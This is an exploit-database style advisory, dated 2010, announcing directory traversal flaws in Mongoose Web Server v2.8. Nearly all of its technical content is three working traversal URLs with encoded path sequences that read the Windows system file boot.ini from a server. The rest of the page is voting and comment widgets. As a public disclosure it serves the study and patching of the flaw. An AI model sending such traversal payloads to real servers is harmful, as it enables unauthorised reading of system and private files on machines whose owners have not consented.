Mongoose Web Server v2.8 Multiple Directory Traversal

2010.04.21

Credit: Dr_IDE

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://code.google.com/p/mongoose/downloads/list
#
################################################################
 
- Description -
 
Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.
 
Mongoose v2.8 is vulnerable to many  remote directory traversal attacks.
 
- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini
 
#[pocoftheday.blogspot.com]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mongoose Web Server v2.8 Multiple Directory Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.